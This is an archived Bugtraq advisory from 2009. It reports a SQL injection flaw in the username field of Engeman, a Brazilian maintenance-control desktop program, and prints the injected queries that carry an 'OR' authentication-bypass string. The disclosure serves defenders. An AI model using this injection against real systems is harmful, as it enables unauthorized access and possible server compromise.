[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Engeman - SQL Injection Vulnerability (vendor url erratum)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Engeman - SQL Injection Vulnerability (vendor url erratum)
From: crashbrz@xxxxxxxxx
Date: 24 Sep 2009 11:43:44 -0000

Engeman is a Brasilian software for maintenance control. 

Version tested: 6.x.x and prior. Next versions appears vulnerable too.

The attacker can inject sql codes in username  textbox:

SQL dump affter injection:

select nome,senha,diasexp,dataltsen,permitetroca from cfgusr where nome='NULL' 
OR NOME<>'1'

select nomegrupo from cfgusr where ignoragrupo='N' and nome='NULL' OR NOME='1'

In firebird the attack have a low impact, but in SQL Server may compromisse the 
server.

**** The version tested is a made in DELPH language, NOT is a Web Software! ****

Vendor site: www.engeman.com.br.

Plase, give the credits to: Crash and _Sl0t_ - DcLabs

Trank´s.

Prev by Date: Black Hat DC Call for Papers is now OPEN
Next by Date: Cross-Site Scripting vulnerability in E107
Previous by thread: Black Hat DC Call for Papers is now OPEN
Next by thread: Cross-Site Scripting vulnerability in E107
Index(es):
- Date
- Thread